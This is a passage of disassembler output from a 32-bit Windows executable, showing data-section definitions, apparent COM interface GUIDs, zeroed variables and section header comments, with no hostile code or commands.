dword_44C8A0 dd 3050F21Fh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_44118A+69�o
; sub_443EA2+76�o
dword_44C8B0 dd 3050F1F7h, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_43A503+9E8�o
dword_44C8C0 dd 3050F240h, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; DATA XREF: sub_44118A+1FA�o
dword_44C8D0 dd 332C4427h, 11D026CBh, 0C00083B4h, 1901D94Fh ; DATA XREF: sub_43A503+2FA�o
dword_44C8E0 dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7h ; DATA XREF: sub_43C6BA+43�o
dword_44C8F0 dd 2 dup(0) ; DATA XREF: sub_43DB9F+C�o
; sub_44186A+C�o ...
dd 0C0h, 46000000h
dword_44C900 dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fh ; DATA XREF: sub_43A503+71�o
; sub_43C6BA+103�o ...
dword_44C910 dd 10h dup(0) ; DATA XREF: sub_444284�o
; sub_444284:loc_44429E�o ...
dword_44C950 dd 0 ; DATA XREF: sub_444228+16�o
; sub_444228:loc_44426A�o ...
dd 0Fh dup(0)
dword_44C990 dd 0 ; DATA XREF: sub_44438D+C�w
; sub_44438D+825�r
dword_44C994 dd 0 ; DATA XREF: sub_44438D+14�w
; sub_44438D+82C�r
dword_44C998 dd 0 ; DATA XREF: sub_44438D+1C�w
; sub_44438D+834�r
dword_44C99C dd 0 ; DATA XREF: sub_44438D+24�w
; sub_44438D+83C�r
align 80h
_data ends
; Section 7. (virtual address 0004D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0004CA00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 44D000h
dd 2Bh dup(0)
dword_44D0AC dd 0 ; DATA XREF: .text:00444CBC�r
dword_44D0B0 dd 0 ; DATA XREF: sub_444CC8�r
dword_44D0B4 dd 0 ; DATA XREF: sub_444CD4�r
align 10h
dword_44D0C0 dd 0 ; DATA XREF: sub_444CE0�r
dword_44D0C4 dd 0 ; DATA XREF: sub_444CEC�r
dword_44D0C8 dd 0 ; DATA XREF: .text:00444CF8�r
dword_44D0CC dd 0 ; DATA XREF: .text:00444D04�r
dword_44D0D0 dd 0 ; DATA XREF: sub_444D10�r
dword_44D0D4 dd 0 ; DATA XREF: sub_444D1C�r
dword_44D0D8 dd 0 ; DATA XREF: sub_444D28�r
dword_44D0DC dd 0 ; DATA XREF: sub_444D34�r
align 1000h
_idata2 ends
end start